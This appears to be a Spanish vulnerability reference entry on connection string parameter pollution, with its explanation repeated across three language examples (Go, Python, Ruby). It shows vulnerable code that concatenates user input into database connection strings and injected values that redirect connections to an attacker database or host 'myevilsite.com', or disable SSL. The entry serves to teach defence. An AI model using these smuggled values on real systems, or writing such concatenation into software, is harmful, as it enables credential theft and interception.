Connection String Parameter Pollution

La concatenación de entradas sin validar en una conexión a base de datos puede permitir que un atacante anule el valor de un parámetro de solicitud. Un atacante puede anular los valores de los parámetros existentes, inyectar un nuevo parámetro o aprovechar las variables fuera de un alcance directo.

Los ataques de contaminación de parámetros de la cadena de conexión (CSPP) consisten en inyectar parámetros de la cadena de conexión en otros parámetros existentes. Esta vulnerabilidad es similar a otras vulnerabilidades, quizás más conocidas, que se producen en entornos HTTP donde también se puede registrar contaminación de parámetros. Sin embargo, también se puede aplicar en otros lugares, como cadenas de conexión a base de datos. Si una aplicación no corrige adecuadamente la entrada de usuario, un usuario malintencionado puede poner en peligro la lógica de la aplicación para llevar a cabo ataques que abarcan desde robar credenciales hasta recuperar la base de datos completa. Mediante el envío de parámetros adicionales con el mismo nombre que un parámetro existente a una aplicación, la base de datos puede reaccionar de una de las siguientes maneras:

Es posible que obtenga los datos del primer parámetro.
Es posible que obtenga los datos del último parámetro.
Es posible que obtenga los datos de todos los parámetros y los concatene juntos.

Esto depende de la unidad utilizada, del tipo de base de datos o incluso de la forma en que se usen las API.


Ejemplo 1: El código siguiente utiliza la entrada de una solicitud HTTP para conectarse a una base de datos:

    ...
    password := request.FormValue("db_pass")
    db, err := sql.Open("mysql", "user:" + password + "@/dbname")
    ...

En este ejemplo, el programador no ha considerado que un atacante podría proporcionar un parámetro db_pass como:
"xxx@/attackerdb?foo=" la cadena de conexión se vuelve:

"user:xxx@/attackerdb?foo=/dbname"

Esto hará que la aplicación se conecte a una base de datos de controlador del atacante, con lo que este podrá controlar los datos que se devuelven a la aplicación.

La concatenación de entradas sin validar en una conexión a base de datos puede permitir que un usuario malintencionado anule el valor de un parámetro de solicitud. Un usuario malintencionado puede anular los valores de los parámetros existentes, inyectar un nuevo parámetro o atacar las variables que están fuera de un alcance directo.

Los ataques de contaminación de parámetros de la cadena de conexión (CSPP) consisten en inyectar parámetros de la cadena de conexión en otros parámetros existentes. Esta vulnerabilidad es similar a otras vulnerabilidades, y quizás la más conocida, que se producen en entornos HTTP donde también se puede registrar contaminación de parámetros. Sin embargo, también se puede aplicar en otros lugares, como cadenas de conexión a base de datos. Si una aplicación no corrige adecuadamente la entrada del usuario, un usuario malintencionado puede poner en peligro la lógica de la aplicación para llevar a cabo ataques de robo de credenciales para recuperar la base de datos completa. Mediante el envío de parámetros adicionales a una aplicación y si estos parámetros tienen el mismo nombre que un parámetro existente, la conexión a la base de datos puede reaccionar de una de las siguientes maneras:

Solo puede obtener los datos del primer parámetro
Puede obtener los datos del último parámetro
Puede obtener los datos de todos los parámetros y concatenarlos juntos

Esto puede depender de la unidad utilizada, del tipo de base de datos o incluso del uso de las API.

Ejemplo 1:el código siguiente utiliza la entrada de una solicitud HTTP para conectarse a una base de datos:

username = req.field('username')
password = req.field('password')
...
client = MongoClient('mongodb://%s:%s@aMongoDBInstance.com/?ssl=true' % (username, password))
...

En este ejemplo, el programador no ha considerado que un usuario malintencionado podría proporcionar un parámetro password como:
"myPassword@aMongoDBInstance.com/?ssl=false&" luego, la cadena de conexión se vuelve (suponiendo que el nombre de usuario es "scott"):

"mongodb://scott:myPassword@aMongoDBInstance.com/?ssl=false&@aMongoDBInstance.com/?ssl=true"

Esto hará que "@aMongoDBInstance.com/?ssl=true" se trate como un argumento no válido adicional, con lo que se ignorará "ssl=true" y se conectará a la base de datos sin cifrado.

La concatenación de entradas sin validar en una conexión a base de datos puede permitir que un usuario malintencionado anule el valor de un parámetro de solicitud. Un usuario malintencionado puede anular los valores de los parámetros existentes, inyectar un nuevo parámetro o atacar las variables fuera de un alcance directo.

Los ataques de contaminación de parámetros de la cadena de conexión (CSPP) consisten en inyectar parámetros de la cadena de conexión en otros parámetros existentes. Esta vulnerabilidad es similar a otras vulnerabilidades, y quizás la más conocida, que se producen en entornos HTTP donde también se puede registrar contaminación de parámetros. Sin embargo, también se puede aplicar en otros lugares, como cadenas de conexión a base de datos. Si una aplicación no corrige adecuadamente la entrada del usuario, un usuario malintencionado puede poner en peligro la lógica de la aplicación para llevar a cabo ataques de robo de credenciales para recuperar la base de datos completa. Mediante el envío de parámetros adicionales a una aplicación y si estos parámetros tienen el mismo nombre que un parámetro existente, la conexión a la base de datos puede reaccionar de una de las siguientes maneras:

Solo puede obtener los datos del primer parámetro
Puede obtener los datos del último parámetro
Puede obtener los datos de todos los parámetros y concatenarlos juntos

Esto puede depender de la unidad utilizada, el tipo de base de datos o incluso cómo se utilizan las API.

Ejemplo 1: El código siguiente utiliza la entrada de una solicitud HTTP para conectarse a una base de datos.

hostname = req.params['host'] #gets POST parameter 'host'
...
conn = PG::Connection.new("connect_timeout=20 dbname=app_development user=#{user} password=#{password} host=#{hostname}")
...

En este ejemplo, el programador no ha considerado que un usuario malintencionado podría proporcionar un parámetro host como:
"myevilsite.com%20port%3D4444%20sslmode%3Ddisable" y luego la cadena de conexión se vuelve (suponiendo un nombre de usuario "scott" y una contraseña "5up3RS3kR3t"):

"dbname=app_development user=scott password=5up3RS3kR3t host=myevilsite.com port=4444 sslmode=disable"

Esto realizará una búsqueda de "myevilsite.com" y se conectará allí en el puerto 4444 y deshabilitará SSL. Esto significaría que el usuario malintencionado podría robar las credenciales del usuario "scott" y luego usarlas para realizar un ataque de tipo "man-in-the-middle" entre su máquina y la base de datos real, o simplemente iniciar sesión en la base de datos real y realizar consultas en la base de datos directamente.